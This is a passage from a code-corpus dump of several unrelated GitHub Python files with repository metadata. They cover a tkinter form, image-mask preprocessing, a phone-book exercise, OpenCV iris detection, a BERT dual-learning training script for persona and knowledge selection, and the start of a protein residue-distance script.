(window.register(validate_username), \"%P\")\n\nerrmsg_name = StringVar()\nerrmsg_date = StringVar()\n\nentry_name = Entry(window, validate=\"key\", validatecommand=check, width=40)\n\nlbl_error_name = Label(foreground=\"red\", textvariable=errmsg_name, wraplength=250)\nlbl_error_date = Label(foreground=\"red\", textvariable=errmsg_date, wraplength=250)\n\nlbl_date = Label(window, text=\"Дата рождения: \")\n\ncal = DateEntry(window, selectmode='day', background=\"#AAA\")\n\nbtn_calculation = Button(window, text=\"Произвести рассчет\", relief=GROOVE, command=test1)\n\noutput = StringVar()\noutput.set(\"Здесь будет результат\")\nlbl_output = Label(window, textvariable=output, wraplength=250)\n\nlbl_description.grid(row=0, column=0, columnspan=2)\nlbl_input.grid(row=1, column=0, columnspan=2)\nlbl_name.grid(row=2, column=0, sticky=W, padx=10)\nentry_name.grid(row=2, column=1, sticky=W)\nlbl_error_name.grid(row=3, column=1, columnspan=1, sticky=W)\nlbl_date.grid(row=4, column=0, columnspan=1, sticky=W, padx=10)\ncal.grid(row=4, column=1, sticky=W)\nlbl_error_date.grid(row=5, column=1, columnspan=1, sticky=W)\nbtn_calculation.grid(row=6, column=0, columnspan=2, sticky=N, pady=30)\nlbl_output.grid(row=7, column=0, columnspan=2)\nwindow.mainloop()\n","repo_name":"KatyaOgareva/passport_replacement","sub_path":"passport_replacement.py","file_name":"passport_replacement.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14894794010","text":"\"\"\"\nScript that modifies segmentation mask with instances. Each color\nis converted to instance id and image is saved in the dame directory.\nDirectory structre:\nroot_dir\n set1\n raw.tif\n labeled.png\n ...\n set2\n raw.tif\n labeled.png\n ...\n\nUsage:\n preprocess_data.py --data-dir=\n\"\"\"\nimport os\n\nimport cv2\nimport numpy as np\nfrom docopt import docopt\nfrom tqdm import tqdm\n\n\ndef convert_colors_to_ids(color_mask):\n unique_colors = np.unique(color_mask.reshape(-1, color_mask.shape[2]), axis=0)\n\n ids_mask = np.zeros(color_mask.shape[:2])\n\n id_counter = 1\n for color in unique_colors:\n if not (color == [0, 0, 0]).all():\n instance = cv2.inRange(color_mask, color, color)\n ids_mask[np.where(instance > 0)] = id_counter\n id_counter += 1\n return ids_mask\n\n\ndef main():\n # args = docopt(__doc__)\n\n # data_dir = args['--data-dir']\n data_dir = '/home/davince/Dropbox (OIST)/Deeplearning_system/Mask-RCNN_OIST/val/'\n\n image_dirs = [os.path.join(data_dir, subdir) for subdir in os.listdir(data_dir)]\n for image_dir in tqdm(image_dirs):\n color_mask = cv2.imread(os.path.join(image_dir, 'labeled.png'))\n\n ids_mask = convert_colors_to_ids(color_mask)\n cv2.imwrite(os.path.join(image_dir, 'instances_ids.png'), ids_mask)\n\n\nif __name__ == '__main__':\n main()\n #\n # image = cv2.imread('/data/upwork/cells/instance_aware_seg/data/train/set1/labeled.png')\n # ids = convert_colors_to_ids(image)\n # cv2.imwrite('test.png', ids)\n","repo_name":"oist/Usiigaci","sub_path":"Mask R-CNN/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"21"} +{"seq_id":"37532314251","text":"f = open(\"phone_book.txt\", 'r')\nall = f.read()\nnumbers = all.split('\\n')\n\nfor i in numbers:\n y=list()\n y.append(i.split('-'))\n\nmynumber = list()\nfor i in numbers:\n mynumber.append(i.split('-'))\n\nresult = list()\nfor (first, middle, last) in mynumber:\n if first == '010' and int(middle) > int(last):\n result.append(''.join(mynumber[x]))\n x=x+1\n\nanswer=list()\nfor i in result:\n answer.append(i+'\\n')\n\nf = open(\"new_phone_book.txt\", 'w')\nf.writelines(answer)\nf.close()\n\n\n\n","repo_name":"yunkio/Study_tobigs12","sub_path":"week1/과제/week1_3_윤기오.py","file_name":"week1_3_윤기오.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24341422951","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# ----------------- Hough circle transform ( circle detection ) ----------------- #\nIMAGE = 'iris.png'\n\n# arg 2 -> to read as a grey scale not RGB scale #\nimg = cv2.imread(IMAGE, 0)\nimg = cv2.medianBlur(img, 5) # improve result of circle detection #\n\n# from grey scale to RGB #\ncimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # cv2 always work with grey scale to BGR #\n\n# arg 1 -> image. , arg 2 -> detection method (HOUGH_GRADIENT).\n# arg 3 -> dp : inverse ratio of the accumulator resolution to the image resolution.\n# arg 4 -> minDist : minimum distance between the centers of the detected circles.\n# arg 5 -> the higher threshold of the two passed to the Canny edge detector.\n# arg 6 -> the accumulator threshold for the circle centers at the detection stage.\n# arg 7 -> minimum circle radius.\n# arg 8 -> maximum circle radius.\ncircles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 50, param1=50, param2=30, minRadius=0, maxRadius=0)\n\ncircles = np.uint16(np.around(circles)) # convert all numbers to integers not float #\n\n# draw the detected circles\n# loop over all the detected circles\nfor i in circles[0, :]:\n # Draw the outer circle with Green color (you can chang the color with the 4th par `(0, 255, 0)` ) #\n cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # Draw the center of the circle with Red color (you can chang the color with the 4th par `(0, 0, 255)` ) #\n cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n\ncv2.imshow('Circle Detection', cimg)\ncv2.imwrite('circle.jpg', cimg)\ncv2.waitKey(2000)\ncv2.destroyAllWindows()\n\n# ----------------- Thresholding ----------------- #\n\n# arg 2 -> to read as a grey scale not RGB scale #\nimg = cv2.imread(IMAGE, 0)\nimg = cv2.medianBlur(img, 5) # improve result of circle detection #\n# Binary Thresholding\n# converts the image into a binary image, where pixel values below the threshold (127 in this case) are set to 0\n# and values above the threshold are set to 255.\nret, BinaryThresholding = cv2.threshold(img, 90, 255, cv2.THRESH_BINARY)\n\n# Adaptive Mean\n# Adaptive thresholding calculates the threshold value for each pixel based on a local neighborhood around it.\n# The neighborhood size is specified as `(11, 2)`,\nAdaptiveThresholding = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\n\n# Adaptive Gaussian\n# threshold value is calculated as the weighted sum of the neighborhood pixels,\n# where the weights are determined by a Gaussian window.\nAdaptiveThresholdingGaussian = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\n\ntitles = ['Original Image', 'Binary Threshold (v = 90)', 'Adaptive Mean', 'Adaptive Gaussian']\nimages = [img, BinaryThresholding, AdaptiveThresholding, AdaptiveThresholdingGaussian]\n\nfor i in range(4):\n plt.subplot(2, 2, i + 1), plt.imshow(images[i], 'gray')\n plt.title(titles[i])\n plt.xticks([]), plt.yticks([])\n\nplt.show()\n\n# ----------------- Segmentation (Final) ----------------- #\n\n# Read in the image 3\nimage = cv2.imread(IMAGE)\n\n# Change color to RGB (from BGR) #\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nplt.imshow(image)\n\n# prepare the image data for the k-means clustering by Reshaping the image into\n# a 2D array of pixels and 3 color values (RGB). (create a new matrix)\n# `-1` for auto complete the new matrix shape.\n# `3` each pixel has three color channels.\npixel_vals = image.reshape((-1, 3))\n\n# Convert to float type to provide greater precision\n# and allows for more accurate calculations\npixel_vals = np.float32(pixel_vals)\n\n# the below line of code defines the criteria for the algorithm to stop running (to stop algo)\n# which will happen is 100 iterations are run or the epsilon (which is the required accuracy)\n# becomes 85% No. iterations required accuracy\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.85)\n\n# then perform k-means clustering wit h number of clusters defined as 3\n# also random centres are initially chose for k-means clustering\nk = 3\nretval, labels, centers = cv2.kmeans(pixel_vals, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n# calculate the new centers for each class (clustering)\n# convert data into 8-bit values\ncenters = np.uint8(centers)\nsegmented_data = centers[labels.flatten()]\n\n# reshape data into the original image dimensions (same like original)\n# draw the new image with same size of original photo\nsegmented_image = segmented_data.reshape(image.shape)\nprint(set(labels.flatten()))\ncv2.imshow(\"Segmented image\", segmented_image)\ncv2.imwrite('segmented_image.jpg', segmented_image)\ncv2.waitKey(2000)\n","repo_name":"mmsaeed509/Image-Processing","sub_path":"semester-3/IrisDetection/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69863041014","text":"import argparse\nimport os\nfrom posix import environ\n#os.environ['CUDA_VISIBLE_DEVICES']='5'\nfrom numpy.lib.arraypad import pad\nfrom tokenizers import InputSequence\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport logging\nimport random\nfrom torch.cuda import check_error\nfrom tqdm import tqdm\nfrom str2bool import str2bool\nimport itertools\nfrom datetime import datetime\n\n#from zxlmetric import f1_metric\nfrom transformers import BertForSequenceClassification\nfrom transformers import BertModel\nfrom transformers import BertConfig\n\nfrom transformers import AdamW, BertTokenizer\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom transformers.optimization import (\n get_cosine_with_hard_restarts_schedule_with_warmup,\n get_cosine_schedule_with_warmup,\n get_constant_schedule,\n get_constant_schedule_with_warmup,\n get_polynomial_decay_schedule_with_warmup\n)\nfrom torch.utils.data import DataLoader, Dataset\nimport json\nfrom dataset.persona_dataset import PersonaDataset\nfrom batcher.persona_batcher import PersonaBatcher\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nparser = argparse.ArgumentParser(description='Pre-training for Knowledge-Grounded Conversation')\n# model\nparser.add_argument(\"--debug\",default=True,type=str2bool,help='debug mode, using small dataset')\nparser.add_argument('--predict',type=str2bool,default=True)\n\n# files\nparser.add_argument(\"--convo_path\",type=str,default='/home/futc/persona/convo')\nparser.add_argument(\"--persona_path\",type=str,default='/home/futc/persona/history')\nparser.add_argument(\"--knowledge_path\",type=str,default='/home/futc/persona/knowledge')\nparser.add_argument(\"--pseudo_path\",type=str,default='/home/futc/2021work2/pseudo')\n\n# model \nparser.add_argument(\"--vocab\",type=str,default='/home/futc/bert-base-uncased')\nparser.add_argument(\"--dualkp_model\",type=str,default='/home/futc/bert-base-uncased')# (P|CRK) dual learning model\nparser.add_argument(\"--dualpk_model\",type=str,default='/home/futc/bert-base-uncased')# (K|CRP) dual learning model\n\n# parser.add_argument(\"--count_path\",type=str,default='/home/futc/2021work2/knowledge_count.json')\n# parser.add_argument(\"--label_path\",type=str,default='/home/futc/2021work2/label.json')\n# training scheme\nparser.add_argument('--batch_size', type=int, default=1)\nparser.add_argument('--eval_batch_size', type=int, default=4)\nparser.add_argument('--num_steps', type=int, default=1000000)\nparser.add_argument('--accum_step', type=int, default=8)\nparser.add_argument('--lr', type=float, default=1e-5)\nparser.add_argument('--clip', type=float, default=2.0)\nparser.add_argument('--schedule', type=str, default='linear')\n\nparser.add_argument('--weight_decay', type=float, default=0.01)\nparser.add_argument('--adam_epsilon', type=float, default=1e-8)\nparser.add_argument('--warmup_steps', type=int, default=500)\nparser.add_argument('--num_epochs', type=int, default=3)\n\n# log\nparser.add_argument('--print_every', type=int, default=100)\nparser.add_argument('--valid_every', type=int, default=10000)\n\n# save\nparser.add_argument(\"--dump_path\",type=str,default='/home/futc/2021work2/dump')\nparser.add_argument('--exp_name', type=str, default='debug')\nparser.add_argument('--log', type=str, default='log')\nparser.add_argument('--seed', type=int, default=42)\n\nparser.add_argument(\"--max_context_length\",type=int,default=64)\nparser.add_argument(\"--max_persona_length\",type=int,default=64)\nparser.add_argument(\"--max_response_length\",type=int,default=64)\nparser.add_argument(\"--max_knowledge_length\",type=int,default=64)\nparser.add_argument(\"--n_knowledge\",default=32,type=int)\nparser.add_argument(\"--n_persona\",default=32,type=int)\n\n# gpu\nparser.add_argument('--gpu_list', type=str, default='4')\nparser.add_argument('--gpu_ratio', type=float, default=0.85)\nparser.add_argument('--n_device', type=int, default=8)\nparser.add_argument('--no_cuda', type=str2bool, default=False)\n\nparser.add_argument(\"--n_layer\",default=6,type=int)\nparser.add_argument(\"--reward\",default='v3',type=str)\n# v1: the target logit - the average logit\n# v2: the target probability - 0.5\n# v3: the target probability\n\nargs = parser.parse_args()\nif args.debug:\n args.print_every=2\n args.valid_every=8\ntorch.cuda.empty_cache()\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nout_dir = os.path.join(args.dump_path, args.exp_name)\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nargs.out_dir=out_dir\nlogger.addHandler(logging.FileHandler(os.path.join(args.out_dir, \"log\"), 'w'))\nlogger.info(\"\\nParameters:\")\nfor attr, value in sorted(vars(args).items()):\n logger.info(\"{}={}\".format(attr.upper(), value))\n\n\n\ndef recall_metric(scores):\n r1,r2,r5,r10=0.,0.,0.,0.\n #count_path=r'/home/futc/cmudog/'+'train'+'_knowledge_count.json'\n #label_path=r'/home/futc/cmudog/'+'train'+'_label_index.json'\n with open(args.count_path,mode='r',encoding='utf-8')as f:\n knowledge_count=json.load(f)\n with open(args.label_path,mode='r',encoding='utf-8')as f:\n label=json.load(f)\n \n assert len(scores)==np.array(knowledge_count).sum()\n assert len(knowledge_count)==len(label)\n\n for i in range(len(knowledge_count)):\n score=scores[:knowledge_count[i]]\n scores=scores[knowledge_count[i]:]\n order=np.argsort(score)[::-1]\n gold=label[i]\n #gold=0 if correct_first else label[i]\n if gold in order[:1]:\n r1+=1\n if gold in order[:2]:\n r2+=1\n if gold in order[:5]:\n r5+=1\n if gold in order[:10]:\n r10+=1\n\n return r1/len(knowledge_count),r2/len(knowledge_count),r5/len(knowledge_count),r10/len(knowledge_count)\n\n\n\n\n# Output directory for models and summaries\n\n#print('Writing to {}\\n'.format(out_dir))\n#save_hparams(args, os.path.join(out_dir, 'hparams'))\n\n\n# Checkpoint directory\n# checkpoint_dir = os.path.join(out_dir, 'checkpoints')\n# checkpoint_prefix = os.path.join(checkpoint_dir, 'model')\n# if not os.path.exists(checkpoint_dir):\n# os.makedirs(checkpoint_dir)\n# sys.stdout.flush()\n\n# Build dataset\ntime_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nlogger.info(\"Create training dataset begin... | %s \" % time_str)\n\ntrain_dataset=PersonaDataset(args.convo_path,args.persona_path,args.knowledge_path,args.pseudo_path,mode='train')\neval_dataset=PersonaDataset(args.convo_path,args.persona_path,args.knowledge_path,args.pseudo_path,mode='eval')\ntrain_loader=DataLoader(train_dataset,batch_size=args.batch_size,shuffle=True,collate_fn=PersonaDataset.collate_fn)\neval_loader=DataLoader(eval_dataset,batch_size=args.eval_batch_size,shuffle=False,collate_fn=PersonaDataset.collate_fn)\ntrain_loader=itertools.cycle(train_loader)\nlogger.info(\"train examples {}\".format(len(train_dataset)))\nlogger.info(\"eval examples {}\".format(len(eval_dataset)))\n\ntime_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nlogger.info(\"Create training dataset end... | %s \" % time_str)\ntokenizer=BertTokenizer.from_pretrained(args.vocab)\ntokenizer.add_special_tokens({'pad_token':'[PAD]','sep_token':'[SEP]'})\nbatcher = PersonaBatcher(device,tokenizer,args.n_knowledge,args.n_persona,args.max_context_length,args.max_response_length,args.max_knowledge_length,args.max_persona_length)\n\n\nconfiguration=BertConfig(num_hidden_layers=args.n_layer)\ndualkp_model=BertForSequenceClassification.from_pretrained(args.dualkp_model,config=configuration)\ndualkp_model.resize_token_embeddings(len(tokenizer))\n\ndualpk_model=BertForSequenceClassification.from_pretrained(args.dualpk_model,config=configuration)\ndualpk_model.resize_token_embeddings(len(tokenizer))\n# semip_model=BertModel(configuration)\n# if args.semip_model:\n# reloaded=torch.load(args.semip_model)['state_dict']\n# semip_model.load_state_dict(reloaded,strict='True')\n\n\n#priorp_model.to(device)\n#priork_model.to(device)\ndualkp_model.to(device)\ndualpk_model.to(device)\n\n\nno_decay = [\"bias\", \"LayerNorm.weight\"]\ndualkp_parameters = [\n {\n \"params\": [p for n, p in dualkp_model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in dualkp_model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n]\ndualpk_parameters = [\n {\n \"params\": [p for n, p in dualpk_model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in dualpk_model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n]\n\ndualkp_optimizer = AdamW(dualkp_parameters, lr=args.lr, eps=args.adam_epsilon)\ndualpk_optimizer = AdamW(dualpk_parameters, lr=args.lr, eps=args.adam_epsilon)\ntotal_steps = args.num_epochs * (len(train_dataset) / (args.batch_size * args.accum_step))\n# scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\nif args.schedule == 'linear':\n dualkp_scheduler = get_linear_schedule_with_warmup(dualkp_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n dualpk_scheduler = get_linear_schedule_with_warmup(dualpk_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\nelif args.schedule == 'cosine':\n dualkp_scheduler = get_cosine_schedule_with_warmup(dualkp_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n dualpk_scheduler= get_cosine_schedule_with_warmup(dualpk_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n\n\ndef train_step(global_step):\n dualloss_total = 0.0\n for _ in range(args.accum_step):\n context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list= next(train_loader)\n #The dual learning part\n dualpk_model.train()\n dualkp_model.eval()\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('k|crp',None,plabel_list)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n #(bs*n_know,2)\n dual_klogits=dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n #(bs,n_know)\n dual_klogits=dual_klogits.view(bs,n_know,-1)[:,:,1]\n #(bs)\n kind=torch.multinomial(torch.softmax(dual_klogits,dim=1),num_samples=1,replacement=True).squeeze(1)\n #kind=torch.max(dual_klogits,dim=1)[1].detach().cpu().tolist()\n selected_know=[knowledge_list[i][min(kind[i].item(),len(knowledge_list[i])-1)] for i in range(bs)]\n \n with torch.no_grad():\n batch_dict=batcher('p|crk',selected_know,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n # (bs*n_per,2)\n post_plogits=dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n # (bs,n_per)\n post_plogits=post_plogits.view(bs,n_per,-1)[:,:,1]\n #(bs)\n target=torch.tensor([persona_list[i].index(plabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n #(bs)\n post_pprob=torch.softmax(post_plogits,dim=1)\n # TODO: the reward need to be designed\n reward=torch.gather(post_pprob,dim=1,index=target.unsqueeze(1)).squeeze(1)\n \n # the tensor to backward the gradient \n tensor1=torch.gather(torch.log_softmax(dual_klogits,dim=1),dim=1,index=kind.unsqueeze(1)).squeeze(1)\n dual_loss1=-torch.sum(tensor1*reward,dim=0)\n dualloss_total+=dual_loss1.item()\n dual_loss1=dual_loss1/args.accum_step\n dual_loss1.backward()\n\n dualkp_model.train()\n dualpk_model.eval()\n batch_dict=batcher('p|crk',klabel_list,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n # (bs*n_per,2)\n dual_plogits=dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n # (bs,n_per)\n dual_plogits=dual_plogits.view(bs,n_per,-1)[:,:,1]\n pind=torch.multinomial(torch.softmax(dual_plogits,dim=1),num_samples=1,replacement=True).squeeze(1)\n #pind=torch.max(dual_plogits,dim=1)[1].detach().cpu().tolist()\n selected_per=[persona_list[i][min(pind[i].item(), len(persona_list[i])-1)] for i in range(bs)]\n with torch.no_grad():\n batch_dict=batcher('k|crp',None,selected_per)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n #(bs*n_know,2)\n post_klogits=dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n #(bs,n_know)\n post_klogits=post_klogits.view(bs,n_know,-1)[:,:,1]\n #(bs)\n target=torch.tensor([knowledge_list[i].index(klabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n #(bs)\n post_kprob=torch.softmax(post_klogits,dim=1)\n #reward=torch.gather(post_kprob,dim=1,index=target.unsqueeze(1)).squeeze(1)-torch.tensor([0.5]*bs,dtype=torch.float,device=device)\n reward=torch.gather(post_kprob,dim=1,index=target.unsqueeze(1)).squeeze(1)\n #reward=torch.gather(post_klogits,dim=1,index=target.unsqueeze(1)).squeeze(1)-torch.mean(post_klogits,dim=1)\n tensor2=torch.gather(torch.log_softmax(dual_plogits,dim=1),dim=1,index=pind.unsqueeze(1)).squeeze(1)\n dual_loss2=-torch.sum(tensor2*reward,dim=0)\n dualloss_total+=dual_loss2.item()\n dual_loss2=dual_loss2/args.accum_step\n dual_loss2.backward()\n # if args.dual_loss=='ce':\n # loss=F.cross_entropy(plogits,target)\n # elif args.dual_loss=='mm':\n # loss=F.multi_margin_loss(logits,target)\n # label=batch_dict['label']\n # loss=model(input_ids=input_id,attention_mask=attention_mask,token_type_ids=segment_id,labels=label,return_dict=True)['loss']\n # loss.backward()\n # ks_loss_total += loss.item()\n\n grad_norm1 = torch.nn.utils.clip_grad_norm_([p for p in dualkp_model.parameters() if p.requires_grad], args.clip)\n grad_norm2 = torch.nn.utils.clip_grad_norm_([p for p in dualpk_model.parameters() if p.requires_grad], args.clip)\n if grad_norm1 >= 1e2 or grad_norm2 >1e2:\n logger.info('WARNING : Exploding Gradients {:.2f} {:.2f}'.format(grad_norm1,grad_norm2))\n dualkp_optimizer.step()\n dualkp_scheduler.step()\n dualkp_optimizer.zero_grad()\n\n dualpk_optimizer.step()\n dualpk_scheduler.step()\n dualpk_optimizer.zero_grad()\n\n if global_step % args.print_every == 0 and global_step != 0:\n time_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n logger.info(\"Step: %d \\t| ks_loss: %.3f \\t| lr: %.8f \\t| %s\" % (\n global_step, dualloss_total, dualkp_scheduler.get_lr()[0], time_str\n ))\n # sys.stdout.flush()\n\ndef predict_step(global_step):\n #if split == 'test_seen':\n # test_loader = test_seen_loader\n #else:\n # raise ValueError\n dualkp_model.eval()\n dualpk_model.eval()\n hit1 = 0\n hit2 = 0\n hit5 = 0 \n hit10= 0\n count=0\n with torch.no_grad():\n for context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list in eval_loader:\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('k|crp',None,plabel_list)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n logits = dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=(input_id.view(-1,seq_len)!=tokenizer.pad_token_id),token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n logits = logits.view(bs,n_know,-1)[:,:,1]\n count += len(context_list)\n if count % 1000 == 0:\n logger.info(\"eval finishing {}\".format(count))\n bs=len(context_list)\n ref=torch.tensor([knowledge_list[i].index(klabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n # hyp=torch.max(logits,dim=1)[1]\n # hit1+=torch.sum(hyp==ref,dim=0).item()\n hyp=torch.topk(logits,k=10)[1]\n hit1+=(hyp[:,:1]==ref[:,None]).sum(1).sum(0).item()\n hit2+=(hyp[:,:2]==ref[:,None]).sum(1).sum(0).item()\n hit5+=(hyp[:,:5]==ref[:,None]).sum(1).sum(0).item()\n hit10+=(hyp[:,:10]==ref[:,None]).sum(1).sum(0).item()\n \n logger.info(\"knowledge prediction hit1 is {:.4f}\".format(hit1/count))\n logger.info(\"knowledge prediction hit2 is {:.4f}\".format(hit2/count))\n logger.info(\"knowledge prediction hit5 is {:.4f}\".format(hit5/count))\n logger.info(\"knowledge prediction hit10 is {:.4f}\".format(hit10/count))\n\n hit1 = 0\n hit2 = 0\n hit5=0\n hit10=0\n count=0\n with torch.no_grad():\n for context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list in eval_loader:\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('p|crk',klabel_list,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n logits = dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=(input_id.view(-1,seq_len)!=tokenizer.pad_token_id),token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n logits = logits.view(bs,n_per,-1)[:,:,1]\n count += len(context_list)\n if count % 1000 == 0:\n logger.info(\"eval finishing {}\".format(count))\n bs=len(context_list)\n ref=torch.tensor([persona_list[i].index(plabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n # hyp=torch.max(logits,dim=1)[1]\n # hit1+=torch.sum(hyp==ref,dim=0).item()\n hyp=torch.topk(logits,k=10)[1]\n hit1+=(hyp[:,:1]==ref[:,None]).sum(1).sum(0).item()\n hit2+=(hyp[:,:2]==ref[:,None]).sum(1).sum(0).item()\n hit5+=(hyp[:,:5]==ref[:,None]).sum(1).sum(0).item()\n hit10+=(hyp[:,:10]==ref[:,None]).sum(1).sum(0).item()\n \n logger.info(\"persona prediction hit1 is {:.4f}\".format(hit1/count))\n logger.info(\"persona prediction hit2 is {:.4f}\".format(hit2/count))\n logger.info(\"persona prediction hit5 is {:.4f}\".format(hit5/count))\n logger.info(\"persona prediction hit10 is {:.4f}\".format(hit10/count))\n\n if args.predict:\n exit()\n # with open(os.path.join(args.out_dir, 'score-iter-{}.txt'.format( global_step)), 'w', encoding='utf-8') as f:\n # for label, score in zip(labels, scores):\n # f.write('{}\\t{}\\n'.format(label, score))\n\n # time_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n # logger.info(\"**********************************\")\n # logger.info(\"test results..........\")\n # logger.info(\"Step: %d \\t| %s\" % (global_step, time_str))\n\n #model_to_save = model.module if hasattr(model, \"module\") else model\n #checkpoint_dir=os.path.join(args.out_dir,'{}step_model'.format(global_step))\n dualpk_model.save_pretrained(os.path.join(args.out_dir,'{}step_dualpk_model'.format(global_step)))\n dualkp_model.save_pretrained(os.path.join(args.out_dir,'{}step_dualkp_model'.format(global_step)))\n #torch.save(dualpk_model,os.path.join(args.out_dir,'{}step_dualpk_model'.format(global_step)))\n #checkpoint_dir=os.path.join(args.out_dir,'{}step_model'.format(global_step))\n #torch.save(dualkp_model,os.path.join(args.out_dir,'{}step_dualkp_model'.format(global_step)))\n logger.info(\"Saved model checkpoint \\n\")\n # f1=recall_metric(scores,test_knowledges,test_responses)\n # return f1\n # r1, r2, r5, r10 = recall_metric(scores)\n # logger.info(\"RECALL-1/2/5/10: {:.4f}/{:.4f}/{:.4f}/{:.4f}\".format(r1, r2, r5, r10))\n # logger.info(\"**********************************\")\n #sys.stdout.flush()\n\n # return {'r_at_1': r1, 'r_at_2': r2, 'r_at_5': r5, 'r_at_10': r10}\n\nbest_f1 = -1.\nif args.predict:\n predict_step(0)\n #logger.info(\"predict result: the f1 between predict knowledge and response: {:.6f}\".format(f1))\n exit()\nfor i in range(args.num_steps):\n train_step(i + 1)\n if (i + 1) % args.valid_every == 0:\n predict_step(i+1)","repo_name":"TingchenFu/PersonaKGC","sub_path":"dual.py","file_name":"dual.py","file_ext":"py","file_size_in_byte":21737,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"21"} +{"seq_id":"72081970613","text":"import Bio.PDB\nimport numpy\nimport os.path\nimport tempfile\nimport urllib\nimport http.client as httplib\nimport signal\n\ndef calc_residue_dist(residue_one, residue_two) :\n \"\"\"\n Returns the C-alpha distance between two residues.\n \"\"\"\n diff_vector = residue_one[\"CA\"].coord - residue_two[\"CA\"].coord\n return numpy.sqrt(numpy.vdot(diff_vector, 